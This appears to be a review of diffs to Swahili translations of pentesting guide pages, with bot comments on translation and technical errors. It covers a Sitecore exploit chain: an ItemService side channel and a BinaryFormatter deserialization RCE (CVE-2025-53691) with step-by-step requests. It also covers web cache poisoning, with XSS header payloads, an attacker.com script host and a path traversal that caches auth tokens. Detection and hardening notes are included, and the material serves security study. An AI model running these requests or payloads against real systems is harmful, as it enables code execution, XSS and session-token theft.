Hata pale ItemService inapojifanya akaunti iliyopunguzwa (e.g., ServicesAPI) na kurudisha array tupu ya Results, TotalCount bado inaweza kuonyesha pre‑ACL Solr hits. Unaweza brute‑force item groups/ids kwa wildcards na kutazama TotalCount ikijikusanya ili kuchora ramani ya internal content na devices:
```
GET /sitecore/api/ssc/item/search?term=%2B_templatename:Device;%2B_group:a*&fields=&page=0&pagesize=100&includeStandardTemplateFields=true
→ "TotalCount": 3
GET /...term=%2B_templatename:Device;%2B_group:aa*
→ "TotalCount": 2
GET /...term=%2B_templatename:Device;%2B_group:aa30d078ed1c47dd88ccef0b455a4cc1*
→ narrow to a specific item
```
## Post‑auth RCE: BinaryFormatter sink katika convertToRuntimeHtml (CVE-2025-53691)

Sink:
```csharp
// Sitecore.Convert
byte[] b = Convert.FromBase64String(data);
return new BinaryFormatter().Deserialize(new MemoryStream(b));
```
Inapatikana kupitia hatua ya pipeline convertToRuntimeHtml ConvertWebControls, ambayo inatafuta element yenye id {iframeId}_inner na hufanya base64 decode + deserializes yake, kisha inaingiza string inayotokana ndani ya HTML:
```csharp
HtmlNode inner = doc.SelectSingleNode("//*[@id='"+id+"_inner']");
string text2 = inner?.GetAttributeValue("value", "");
if (text2.Length > 0)
htmlNode2.InnerHtml = StringUtil.GetString(Sitecore.Convert.Base64ToObject(text2) as string);
```
Chochea (iliyothibitishwa, haki za Content Editor). Dialogi ya FixHtml inaita convertToRuntimeHtml. Mchakato kamili bila kubofya UI:
```
// 1) Start Content Editor
GET /sitecore/shell/Applications/Content%20Editor.aspx

// 2) Load malicious HTML into EditHtml session (XAML event)
POST /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.aspx
Content-Type: application/x-www-form-urlencoded

__PARAMETERS=edithtml:fix&...&ctl00$ctl00$ctl05$Html=
<html>
<iframe id="test" src="poc" value="poc"></iframe>
<test id="test_inner" value="BASE64_GADGET"></test>
</html>

// 3) Server returns a session handle (hdl) for FixHtml
{"command":"ShowModalDialog","value":"/sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=..."}

// 4) Visit FixHtml to trigger ConvertWebControls → deserialization
GET /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=...
```
Gadget generation: use ysoserial.net / YSoNet with BinaryFormatter to produce a base64 payload returning a string. The string’s contents are written into the HTML by ConvertWebControls after deserialization side‑effects execute.


{{#ref}}
../../../pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
{{#endref}}

## Mnyororo kamili

1) Mshambulizi wa Pre‑auth anachafua HtmlCache na HTML yoyote kwa kuitisha kwa reflective WebControl.AddToCache kupitia XAML AjaxScriptManager.
2) HTML iliyochafuliwa hutumikia JavaScript inayomshawishi mtumiaji aliye authenticated wa Content Editor kupitia mtiririko wa FixHtml.
3) Ukurasa wa FixHtml unasababisha convertToRuntimeHtml → ConvertWebControls, ambayo inadekodeserializa base64 inayoendeshwa na mshambuliaji kupitia BinaryFormatter → RCE chini ya identity ya app pool ya Sitecore.

## Ugunduzi

- Pre‑auth XAML: maombi kwa `/-/xaml/Sitecore.Shell.Xaml.WebControl` yenye `__ISEVENT=1`, `__SOURCE` isiyo ya kawaida na `__PARAMETERS=AddToCache(...)`.
- ItemService probing: spikes ya maswali ya wildcard kwa `/sitecore/api/ssc`, `TotalCount` kubwa na `Results` tupu.
- Deserialization attempts: `EditHtml.aspx` ikifuatiwa na `FixHtml.aspx?hdl=...` na base64 kubwa isiyo ya kawaida katika vikambu vya HTML.

## Kuimarisha usalama

- Apply Sitecore patches KB1003667 and KB1003734; gate/disable pre‑auth XAML handlers or add strict validation; fuatilia na weka rate‑limit `/-/xaml/`.
- Ondoa/ibadilishe BinaryFormatter; zuia upatikanaji wa convertToRuntimeHtml au tekeleza uthibitisho mkali upande wa server kwa mtiririko wa uhariri wa HTML.
- Funga `/sitecore/api/ssc` kwa loopback au roles zilizo authenticated; epuka mifumo ya impersonation zinazoweza leak za side channels zenye msingi wa `TotalCount`.
- Leteza MFA/least privilege kwa watumiaji wa Content Editor; hakiki CSP ili kupunguza athari ya JS steering kutoka cache poisoning.

## References

- [watchTowr Labs – Cache Me If You Can: Sitecore Experience Platform Cache Poisoning to RCE](https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/)
|
||||
- [Sitecore KB1003667 – Security patch](https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667)
|
||||
- [Sitecore KB1003734 – Security patch](https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003734)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
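Review bot: in step 3 of the full chain, `ambayo inadekodeserializa base64 inayoendeshwa na mshambuliaji kupitia BinaryFormatter` runs two verbs into one word; it should read `ambayo inadekodi base64 inayodhibitiwa na mshambuliaji na kui-deserialize kwa BinaryFormatter`. Worth spelling out there, because the numbered steps do not: `Sitecore.Convert.Base64ToObject(text2) as string` only writes the result into the HTML when the deserialized object is a string, but BinaryFormatter executes the gadget's side effects inside `Deserialize` before that cast, so a payload that does not return a string still runs; the "Gadget generation" paragraph says this, the steps do not. The new file also ships with untranslated English sentences in the middle of the Swahili text (`Gadget generation: use ysoserial.net / YSoNet with BinaryFormatter to produce a base64 payload returning a string.`, `Apply Sitecore patches KB1003667 and KB1003734; gate/disable pre‑auth XAML handlers or add strict validation;` and the `## References` heading while the other headings are Swahili), and `Leteza MFA/least privilege` in the hardening list should be `Tekeleza MFA/least privilege`.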
@ -2,74 +2,75 @@
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Tofauti
|
||||
## The difference
|
||||
|
||||
> **Tofauti kati ya web cache poisoning na web cache deception ni ipi?**
|
||||
> **What is the difference between web cache poisoning and web cache deception?**
|
||||
>
|
||||
> - Katika **web cache poisoning**, mshambuliaji anasababisha programu kuhifadhi maudhui mabaya katika cache, na maudhui haya yanatolewa kutoka kwenye cache kwa watumiaji wengine wa programu.
|
||||
> - Katika **web cache deception**, mshambuliaji anasababisha programu kuhifadhi maudhui nyeti yanayomilikiwa na mtumiaji mwingine katika cache, na mshambuliaji kisha anapata maudhui haya kutoka kwenye cache.
|
||||
> - In **web cache poisoning**, mshambuliaji husababisha programu kuhifadhi baadhi ya maudhui hatarishi katika cache, na maudhui haya hutolewa kutoka cache kwa watumiaji wengine wa programu.
|
||||
> - In **web cache deception**, mshambuliaji husababisha programu kuhifadhi maudhui nyeti ya mtumiaji mwingine katika cache, kisha mshambuliaji hurudisha maudhui haya kutoka kwenye cache.
|
||||
|
||||
## Cache Poisoning
|
||||
|
||||
Cache poisoning inalenga kubadilisha cache ya upande wa mteja ili kulazimisha wateja kupakua rasilimali ambazo hazitarajiwa, sehemu, au chini ya udhibiti wa mshambuliaji. Kiwango cha athari kinategemea umaarufu wa ukurasa ulioathiriwa, kwani jibu lililochafuliwa linatolewa pekee kwa watumiaji wanaotembelea ukurasa wakati wa kipindi cha uchafuzi wa cache.
|
||||
Cache poisoning inalenga kuingilia cache ya upande wa mteja ili kumlazimisha mteja kupakia rasilimali zisizotarajiwa, zisizokamilika, au zilizo chini ya udhibiti wa mshambuliaji. Ukubwa wa athari unategemea maarufu ya ukurasa uliokumba, kwani majibu yaliyochafu hutolewa kwa watumiaji wanaotembelea ukurasa wakati wa kipindi cha uchafu wa cache pekee.
|
||||
|
||||
Utekelezaji wa shambulio la cache poisoning unajumuisha hatua kadhaa:
|
||||
Utekelezaji wa shambulio la cache poisoning unahusisha hatua kadhaa:
|
||||
|
||||
1. **Utambuzi wa Ingizo Lisilo na Funguo**: Hizi ni vigezo ambavyo, ingawa havihitajiki kwa ombi kuhifadhiwa kwenye cache, vinaweza kubadilisha jibu linalotolewa na seva. Kutambua vigezo hivi ni muhimu kwani vinaweza kutumika kubadilisha cache.
|
||||
2. **Kutatua Vigezo Visivyo na Funguo**: Baada ya kutambua vigezo visivyo na funguo, hatua inayofuata ni kubaini jinsi ya kutumia vibaya vigezo hivi ili kubadilisha jibu la seva kwa njia inayomfaidi mshambuliaji.
|
||||
3. **Kuhakikisha Jibu Lililochafuliwa Linahifadhiwa**: Hatua ya mwisho ni kuhakikisha kwamba jibu lililobadilishwa linahifadhiwa kwenye cache. Kwa njia hii, mtumiaji yeyote anayepata ukurasa ulioathiriwa wakati cache imechafuliwa atapata jibu lililochafuliwa.
|
||||
1. **Kuainisha vigezo visivyotumika kama key**: Hii ni vigezo ambavyo, ingawa havihitajiki kwa ombi kuhifadhiwa kwenye cache, vinaweza kubadilisha majibu yanayotolewa na server. Kuainisha vigezo hivi ni muhimu kwa sababu vinaweza kutumiwa kuathiri cache.
|
||||
2. **Kutumia vigezo visivyo na key**: Baada ya kuainisha vigezo visivyo na key, hatua inayofuata ni kubaini jinsi ya kutumia vibaya vigezo hivi ili kubadilisha majibu ya server kwa njia inayomfaa mshambuliaji.
|
||||
3. **Kuhakikisha Majibu yaliyochafu yamehifadhiwa kwenye cache**: Hatua ya mwisho ni kuhakikisha kuwa majibu yaliyobadilishwa yamehifadhiwa kwenye cache. Kwa njia hiyo, mtumiaji yeyote anayeingia ukurasa uliokumba wakati cache imechafuka atapokea jibu lililochafuka.
|
||||
|
||||
### Ugunduzi: Angalia vichwa vya HTTP
|
||||
### Discovery: Check HTTP headers
|
||||
|
||||
Kawaida, wakati jibu lime **hifadhiwa kwenye cache** kutakuwa na **kichwa kinachoonyesha hivyo**, unaweza kuangalia vichwa gani unapaswa kuzingatia katika chapisho hili: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
|
||||
Kawaida, wakati jibu lilihifadhiwa kwenye cache kutakuwa na kichwa kinachoonyesha hivyo; unaweza kuangalia ni vichwa gani vinavyostahili kuzingatiwa katika chapisho hili: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
|
||||
|
||||
### Ugunduzi: Kihesabu makosa ya caching
|
||||
### Discovery: Caching error codes
|
||||
|
||||
Ikiwa unafikiria kwamba jibu linahifadhiwa kwenye cache, unaweza kujaribu **kutuma maombi yenye kichwa kibaya**, ambacho kinapaswa kujibiwa kwa **kodi ya hali 400**. Kisha jaribu kufikia ombi kawaida na ikiwa **jibu ni kodi ya hali 400**, unajua ni hatari (na unaweza hata kufanya DoS).
|
||||
Iwapo unafikiri jibu linawekwa kwenye cache, unaweza kujaribu kutuma maombi yenye header mbaya, ambayo yanapaswa kurejelewa na status code 400. Kisha jaribu kufikia ombi kawaida na ikiwa jibu ni status code 400, unajua ni vunja (na hata unaweza kutekeleza DoS).
|
||||
|
||||
You can find more options in:
|
||||
|
||||
Unaweza kupata chaguzi zaidi katika:
|
||||
|
||||
{{#ref}}
|
||||
cache-poisoning-to-dos.md
|
||||
{{#endref}}
|
||||
|
||||
Hata hivyo, kumbuka kwamba **wakati mwingine aina hizi za kodi za hali hazihifadhiwi** hivyo jaribio hili linaweza kuwa si la kuaminika.
|
||||
Hata hivyo, kumbuka kwamba wakati mwingine aina hizi za status codes hazihifadhiwi kwenye cache, kwa hivyo jaribio hili halina uhakika.
|
||||
|
||||
### Ugunduzi: Tambua na tathmini vigezo visivyo na funguo
|
||||
### Discovery: Identify and evaluate unkeyed inputs
|
||||
|
||||
Unaweza kutumia [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) ili **kufanya brute-force vigezo na vichwa** ambavyo vinaweza kuwa **vinabadilisha jibu la ukurasa**. Kwa mfano, ukurasa unaweza kuwa unatumia kichwa `X-Forwarded-For` kuonyesha mteja kupakua script kutoka pale:
|
||||
Unaweza kutumia [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) kufanyia brute-force parameters na headers ambazo zinaweza kubadilisha jibu la ukurasa. Kwa mfano, ukurasa unaweza kutumia header `X-Forwarded-For` kuonyesha mteja kupakia script kutoka huko:
|
||||
```html
|
||||
<script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
|
||||
```
|
||||
### Elicit a harmful response from the back-end server
|
||||
### Sababisha jibu hatari kutoka kwa back-end server
|
||||
|
||||
With the parameter/header identified check how it is being **sanitised** and **where** is it **getting reflected** or affecting the response from the header. Can you abuse it anyway (perform an XSS or load a JS code controlled by you? perform a DoS?...)
|
||||
Ukibaini parameter/header, angalia jinsi inavyosafishwa na wapi inarejea au inavyoathiri response kutoka kwa header. Je, unaweza kuitumia vibaya (perform an XSS au load JS unayodhibiti? perform DoS?...)
|
||||
|
||||
### Get the response cached
|
||||
### Pata response ikahifadhiwa kwenye cache
|
||||
|
||||
Once you have **identified** the **page** that can be abused, which **parameter**/**header** to use and **how** to **abuse** it, you need to get the page cached. Depending on the resource you are trying to get in the cache this could take some time, you might need to be trying for several seconds.
|
||||
Mara baada ya kuwa umeya **baini** **page** inayoweza kutumika vibaya, ni **parameter**/**header** gani ya kutumia na **jinsi** ya kuiabusa, unahitaji kuhakikisha ukurasa umehifadhiwa kwenye cache. Kulingana na rasilimali unayotaka kuweka kwenye cache, inaweza kuchukua muda; huenda ukahitaji kujaribu kwa sekunde kadhaa.
|
||||
|
||||
The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\
|
||||
The header **`Cache-Control`** is also interesting to know if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800`
|
||||
Header **`X-Cache`** katika response inaweza kuwa muhimu kwani inaweza kuwa na thamani **`miss`** wakati request haikuwekwa kwenye cache na thamani **`hit`** wakati imehifadhiwa.\
|
||||
Header **`Cache-Control`** pia ni muhimu kujua ikiwa rasilimali inawekwa kwenye cache na ni lini itahifadhiwa tena: `Cache-Control: public, max-age=1800`
|
||||
|
||||
Another interesting header is **`Vary`**. This header is often used to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.
|
||||
Header nyingine ya kuvutia ni **`Vary`**. Header hii mara nyingi hutumika kuonyesha **headers za ziada** zinazochukuliwa kama **sehemu ya cache key** hata kama kawaida hazizingatiiwi kama key. Kwa hivyo, ikiwa mshambuliaji anajua `User-Agent` ya mwathiriwa anayemlenga, anaweza poison the cache kwa watumiaji wanaotumia `User-Agent` hiyo.
|
||||
|
||||
One more header related to the cache is **`Age`**. It defines the times in seconds the object has been in the proxy cache.
|
||||
Header nyingine inayohusiana na cache ni **`Age`**. Inabainisha muda kwa sekunde ambao kitu kimekuwa katika proxy cache.
|
||||
|
||||
When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working.
|
||||
Unapohifadhi request kwenye cache, kuwa **makini na headers unazotumia** kwa sababu baadhi yao yanaweza **kutumika bila kutarajiwa** kama **keyed** na **mwathiriwa atahitaji kutumia header hiyo hiyo**. Daima **jaribu** Cache Poisoning kwa **browsers tofauti** ili uhakikishe inafanya kazi.
|
||||
|
||||
## Exploiting Examples
|
||||
## Mifano ya Exploiting
|
||||
|
||||
### Easiest example
|
||||
### Mfano rahisi zaidi
|
||||
|
||||
A header like `X-Forwarded-For` is being reflected in the response unsanitized.\
|
||||
You can send a basic XSS payload and poison the cache so everybody that accesses the page will be XSSed:
|
||||
Header kama `X-Forwarded-For` inarejea kwenye response bila kusafishwa.\
|
||||
Unaweza kutuma payload ya msingi ya XSS na poison the cache ili kila mtu anayefungua ukurasa apate XSS:
|
||||
```html
|
||||
GET /en?region=uk HTTP/1.1
|
||||
Host: innocent-website.com
|
||||
X-Forwarded-Host: a."><script>alert(1)</script>"
|
||||
```
|
||||
_Note that this will poison a request to `/en?region=uk` not to `/en`_
|
||||
_Kumbuka kwamba hii itapoison ombi kwa `/en?region=uk` si kwa `/en`_
|
||||
|
||||
### Cache poisoning to DoS
|
||||
|
||||
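Review bot: under `### Mfano rahisi zaidi` the prose says `Header kama X-Forwarded-For inarejea kwenye response bila kusafishwa` but the request that follows injects `X-Forwarded-Host: a."><script>alert(1)</script>"`; the reflected header in the text and in the example must be the same one, otherwise a reader poisons the wrong header. Two translation errors change meaning: `ikiwa jibu ni status code 400, unajua ni vunja` is not Swahili for "vulnerable" (the old line had `unajua ni hatari`), and `Mara baada ya kuwa umeya **baini**` splits `umeyabaini`. The two quoted bullets keep the English opener, `In **web cache poisoning**, mshambuliaji husababisha...` / `In **web cache deception**, mshambuliaji husababisha...`; use `Katika` as the old lines did. Finally, `Cache poisoning inalenga kuingilia cache ya upande wa mteja` ("client-side cache") is misleading: the cache being poisoned is the shared proxy/CDN cache, which is exactly why the same response reaches other users (the same page later reads `Age` as time spent in the proxy cache); suggest `cache ya pamoja (proxy/CDN)`.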
@ -80,52 +81,54 @@ cache-poisoning-to-dos.md
|
||||
|
||||
### Cache poisoning through CDNs
|
||||
|
||||
In **[this writeup](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html)** it's explained the following simple scenario:
|
||||
Katika **[this writeup](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html)** inaelezea tukio rahisi lifuatalo:
|
||||
|
||||
- CDN itachache chochote chini ya `/share/`
|
||||
- CDN HAIta decode wala normalize `%2F..%2F`, hivyo, inaweza kutumika kama **path traversal kuaccess maeneo mengine nyeti ambayo yatakahifadhiwa** kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123`
|
||||
- Web server ITAdecode na normalize `%2F..%2F`, na itajibu na `/api/auth/session`, ambayo **ina token ya uthibitishaji**.
|
||||
- CDN itakayocache chochote chini ya `/share/`
|
||||
- CDN haitadecode wala haitanormalize `%2F..%2F`, kwa hivyo inaweza kutumika kama **path traversal to access other sensitive locations that will be cached** kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123`
|
||||
- Server ya wavuti WILL decode and normalize `%2F..%2F`, na itajibu na `/api/auth/session`, ambayo **ina auth token**.
|
||||
|
||||
### Using web cache poisoning to exploit cookie-handling vulnerabilities
|
||||
|
||||
Cookies pia zinaweza kuakisiwa kwenye jibu la ukurasa. Ikiwa unaweza kuitumia kuleta XSS kwa mfano, unaweza kuwa na uwezo wa kutumia XSS katika wateja kadhaa wanaopakia jibu la cache lililo na uharibifu.
|
||||
Cookies pia zinaweza kuonekana katika response ya ukurasa. Ikiwa unaweza kuabuse hilo kusababisha XSS, kwa mfano, unaweza ku-exploit XSS katika clients kadhaa zinazopakia malicious cache response.
|
||||
```html
|
||||
GET / HTTP/1.1
|
||||
Host: vulnerable.com
|
||||
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
|
||||
```
|
||||
Kumbuka kwamba ikiwa cookie iliyo hatarini inatumika sana na watumiaji, maombi ya kawaida yatakuwa yakisafisha cache.
|
||||
Kumbuka kwamba ikiwa cookie iliyo hatarini inatumiwa mara kwa mara na watumiaji, maombi ya kawaida yataosha cache.
|
||||
|
||||
### Kutengeneza tofauti na vikwazo, urekebishaji na nukta <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
|
||||
### Generating discrepancies with delimiters, normalization and dots <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
|
||||
|
||||
Angalia:
|
||||
|
||||
{{#ref}}
|
||||
cache-poisoning-via-url-discrepancies.md
|
||||
{{#endref}}
|
||||
|
||||
### Kuambukiza cache kwa kutumia njia ya kupita ili kuiba funguo za API <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
|
||||
|
||||
[**Andiko hili linaelezea**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) jinsi ilivyowezekana kuiba funguo za OpenAI API kwa URL kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` kwa sababu chochote kinacholingana na `/share/*` kitahifadhiwa bila Cloudflare kurekebisha URL, ambayo ilifanyika wakati ombi lilipofika kwenye seva ya wavuti.
|
||||
|
||||
Hii pia inaelezwa vizuri zaidi katika:
|
||||
|
||||
{{#ref}}
|
||||
cache-poisoning-via-url-discrepancies.md
|
||||
{{#endref}}
|
||||
|
||||
### Kutumia vichwa vingi ili kutumia udhaifu wa kuambukiza cache ya wavuti <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
|
||||
### Cache poisoning with path traversal to steal API key <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
|
||||
|
||||
Wakati mwingine utahitaji **kutumia ingizo kadhaa zisizo na funguo** ili uweze kutumia cache. Kwa mfano, unaweza kupata **Open redirect** ikiwa utaweka `X-Forwarded-Host` kwa kikoa kinachodhibitiwa na wewe na `X-Forwarded-Scheme` kuwa `http`. **Ikiwa** **seva** in **peleka** maombi yote ya **HTTP** **kwenda HTTPS** na kutumia kichwa `X-Forwarded-Scheme` kama jina la kikoa kwa ajili ya uelekeo. Unaweza kudhibiti mahali ukurasa unapoelekezwa na uelekeo.
|
||||
[**This writeup explains**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) jinsi ilivyowezekana kuiba OpenAI API key kwa URL kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` kwa sababu chochote kinacholingana na `/share/*` kitabebwa bila Cloudflare normalising the URL, ambayo ilifanywa wakati ombi lilipofika kwenye web server.
|
||||
|
||||
Hii pia imeelezewa vyema katika:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
cache-poisoning-via-url-discrepancies.md
|
||||
{{#endref}}
|
||||
|
||||
### Using multiple headers to exploit web cache poisoning vulnerabilities <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
|
||||
|
||||
Wakati mwingine utahitaji **exploit several unkeyed inputs** ili uweze abuse cache. Kwa mfano, unaweza kupata an **Open redirect** ikiwa utaweka `X-Forwarded-Host` kwa domain unayodhibiti na `X-Forwarded-Scheme` kuwa `http`. Ikiwa **server** inafanya **forwarding** maombi yote ya **HTTP** **to HTTPS** na inatumia header `X-Forwarded-Scheme` kama jina la domain kwa redirect, unaweza kudhibiti wapi ukurasa unaelekezwa na redirect.
|
||||
```html
|
||||
GET /resources/js/tracking.js HTTP/1.1
|
||||
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
|
||||
X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
|
||||
X-Forwarded-Scheme: http
|
||||
```
|
||||
### Kutumia kwa kutumia kichwa kidogo cha `Vary`
|
||||
### Kutumia `Vary`header iliyopunguzwa
|
||||
|
||||
Ikiwa umebaini kwamba kichwa cha **`X-Host`** kinatumika kama **jina la kikoa kupakia rasilimali ya JS** lakini kichwa cha **`Vary`** katika jibu kinaonyesha **`User-Agent`**. Basi, unahitaji kutafuta njia ya kutoa User-Agent ya mwathirika na kuharibu cache kwa kutumia user agent hiyo:
|
||||
Ikiwa umegundua kwamba **`X-Host`** header inatumika kama **jina la domaini kupakia rasilimali ya JS** lakini header ya **`Vary`** katika jibu inaonyesha **`User-Agent`**. Kisha, unahitaji kupata njia ya exfiltrate `User-Agent` ya mwanaathirika na poison the cache ukitumia `User-Agent` huo:
|
||||
```html
|
||||
GET / HTTP/1.1
|
||||
Host: vulnerbale.net
|
||||
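Review bot: the sentence `Ikiwa **server** inafanya **forwarding** maombi yote ya **HTTP** **to HTTPS** na inatumia header X-Forwarded-Scheme kama jina la domain kwa redirect` names the wrong header: the host of the redirect is taken from `X-Forwarded-Host`, while `X-Forwarded-Scheme: http` only makes the server believe the request was plain HTTP so that it issues the HTTPS redirect at all. The request below it (`X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/` plus `X-Forwarded-Scheme: http`) shows that split, so the prose should match it. Smaller points in the same hunk: `Server ya wavuti WILL decode and normalize %2F..%2F` leaves an English fragment mid-sentence; `CDN itakayocache chochote chini ya /share/` is a relative clause ("which will cache") and leaves the bullet without a main verb, `CDN itaweka kwenye cache chochote chini ya /share/` reads correctly; `### Cache poisoning through CDNs` and `### Cache poisoning with path traversal to steal API key` both retell the same nokline writeup and the same `/share/%2F..%2Fapi/auth/session?cachebuster=123` trick and could be one subsection; `### Kutumia \`Vary\`header iliyopunguzwa` is missing the space after the backtick; and `Host: vulnerbale.net` in the `Vary` example is a typo for `vulnerable.net`.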
@ -134,7 +137,7 @@ X-Host: attacker.com
|
||||
```
|
||||
### Fat Get
|
||||
|
||||
Tuma ombi la GET na ombi katika URL na katika mwili. Ikiwa seva ya wavuti inatumia ile kutoka kwa mwili lakini seva ya cache inahifadhi ile kutoka kwa URL, mtu yeyote anayefikia URL hiyo atatumia parameter kutoka kwa mwili. Kama ilivyo katika udhaifu ambao James Kettle alipata kwenye tovuti ya Github:
|
||||
Tuma GET request yenye request katika URL na katika body. Ikiwa web server inatumia ile kutoka body lakini cache server inahifadhi ile kutoka URL, yeyote anayefikia URL hiyo atatumia parameter kutoka body. Kama vile vuln James Kettle alipogundua kwenye Github website:
|
||||
```
|
||||
GET /contact/report-abuse?report=albinowax HTTP/1.1
|
||||
Host: github.com
|
||||
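Review bot: `Tuma GET request yenye request katika URL na katika body` says "a request inside the request"; what is duplicated is the parameter, `report=` in the example, once in the query string and once in the body, so the line should say `yenye parameter ileile katika URL na katika body`, matching the old `ombi ... na ombi` which had the same problem. `Kama vile vuln James Kettle alipogundua kwenye Github website` means "when James Kettle discovered", leaving the sentence unfinished; `vuln ambayo James Kettle aliigundua kwenye tovuti ya GitHub` closes it.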
@ -143,103 +146,120 @@ Content-Length: 22
|
||||
|
||||
report=innocent-victim
|
||||
```
|
||||
There it a portswigger lab about this: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
|
||||
Kuna labu ya PortSwigger kuhusu hili: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
|
||||
|
||||
### Parameter Cloacking
|
||||
|
||||
Kwa mfano, inawezekana kutenganisha **parameters** katika seva za ruby kwa kutumia herufi **`;`** badala ya **`&`**. Hii inaweza kutumika kuweka thamani za parameters zisizo na ufunguo ndani ya zile zenye ufunguo na kuzitumia vibaya.
|
||||
For example it's possible to separate **parameters** in ruby servers using the char **`;`** instead of **`&`**. This could be used to put unkeyed parameters values inside keyed ones and abuse them.
|
||||
|
||||
Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
|
||||
|
||||
### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
|
||||
|
||||
Jifunze hapa jinsi ya kutekeleza [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-poisoning).
|
||||
Jifunze hapa kuhusu jinsi ya kufanya [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-poisoning).
|
||||
|
||||
### Automated testing for Web Cache Poisoning
|
||||
### Upimaji wa otomatiki kwa Web Cache Poisoning
|
||||
|
||||
The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) can be used to automatically test for web cache poisoning. It supports many different techniques and is highly customizable.
|
||||
The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) inaweza kutumiwa kupima otomatiki kwa web cache poisoning. Inasaidia mbinu nyingi tofauti na inaweza kubinafsishwa kwa kiasi kikubwa.
|
||||
|
||||
Example usage: `wcvs -u example.com`
|
||||
Mfano wa matumizi: `wcvs -u example.com`
|
||||
|
||||
### Header-reflection XSS + CDN/WAF-assisted cache seeding (User-Agent, auto-cached .js)
|
||||
|
||||
Mfano huu wa kweli unachanganya primitive ya reflection inayotegemea kichwa na tabia ya CDN/WAF ili kwa uhakika kuharibu HTML iliyohifadhiwa inayotolewa kwa watumiaji wengine:
|
||||
Mfano huu wa ulimwengu halisi unaunganisha primitive ya header-based reflection na tabia ya CDN/WAF ili kwa kuaminika ku-poison HTML iliyohifadhiwa (cached) inayotumiwa kwa watumiaji wengine:
|
||||
|
||||
- HTML kuu ilireflect ombi la kichwa kisichoaminika (mfano, `User-Agent`) katika muktadha wa kutekeleza.
|
||||
- CDN iliondoa vichwa vya cache lakini cache ya ndani/origini ilikuwepo. CDN pia ilihifadhi ombi moja kwa moja ya ombi yanayomalizika kwa nyongeza za statiki (mfano, `.js`), wakati WAF ilitumia ukaguzi dhaifu wa maudhui kwa GETs za mali za statiki.
|
||||
